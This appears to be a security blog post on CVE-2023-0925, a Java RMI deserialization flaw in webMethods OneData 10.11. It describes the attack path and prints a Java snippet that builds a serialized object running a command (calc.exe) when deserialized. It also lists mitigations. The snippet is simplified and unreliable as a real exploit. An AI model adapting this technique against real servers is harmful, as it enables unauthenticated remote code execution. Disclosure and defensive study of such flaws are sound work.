CVE-2023-0925 - Exploiting webMethods OneData Version 10.11's Java RMI interfaces to execute malicious code
A recent vulnerability, assigned as CVE-2023-0925, has been identified in version 10.11 of webMethods OneData which is known to run an embedded instance of Azul Zulu Java 11..15. The software hosts a Java Remote Method Invocation (RMI) registry on TCP port 2099 by default, as well as two RMI interfaces listening on a single, dynamically assigned TCP high port. This vulnerability allows an unauthenticated attacker with network connectivity to remotely execute malicious code with the privileges of the software's operating system account, usually the local System account on Windows.
In this post, we will discuss the exploit details, provide code snippets, and provide links to original references for further understanding of this vulnerability.
Exploit Details
The RMI registry on port 2099 allows for remotely loading and processing data via RMI interfaces. An attacker can abuse this functionality to instruct the webMethods OneData application to load a malicious serialized Java object as a parameter to one of the available Java methods presented by the RMI interface. Once deserialized on the vulnerable server, the malicious code runs with the privileges of the software's operating system account, which is usually the local System account on Windows.
Here is a simple Java code snippet that demonstrates the creation of a malicious serialized object
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
public class MaliciousObject implements Serializable {
private static final long serialVersionUID = 1L;
private void readObject(java.io.ObjectInputStream in) throws java.io.IOException, ClassNotFoundException {
in.defaultReadObject();
// Malicious code to be executed upon deserialization
Runtime.getRuntime().exec("calc.exe");
}
public static void main(String[] args) throws Exception {
MaliciousObject mo = new MaliciousObject();
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("malicious_object.ser"));
oos.writeObject(mo);
oos.close();
}
}
In the example above, a malicious object is created, and upon deserialization, a simple calculator application is opened. When exploited in a real-world scenario, the malicious code will likely be more harmful, allowing attackers to control the vulnerable server.
For detailed information about the vulnerability, you can refer to the following links
1. webMethods OneData product page: https://www.softwareag.com/en_corporate/products/data_analytics/p1_1/overview.html
2. Azul Zulu Java Embedded: https://www.azul.com/downloads/zulu-embedded/
3. CVE-2023-0925 description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0925
Mitigation
As of now, there is no specific patch available for this vulnerability. However, it is recommended to restrict access to the RMI registry and the RMI interface ports using firewalls and network-level controls. In addition, it is advised to run the webMethods OneData application using a least-privileged operating system account to limit the potential impact of a successful exploit. Make sure to routinely check for security updates and patches from the software provider.
Timeline
Published on: 09/06/2023 18:15:00 UTC
Last modified on: 09/14/2023 15:40:00 UTC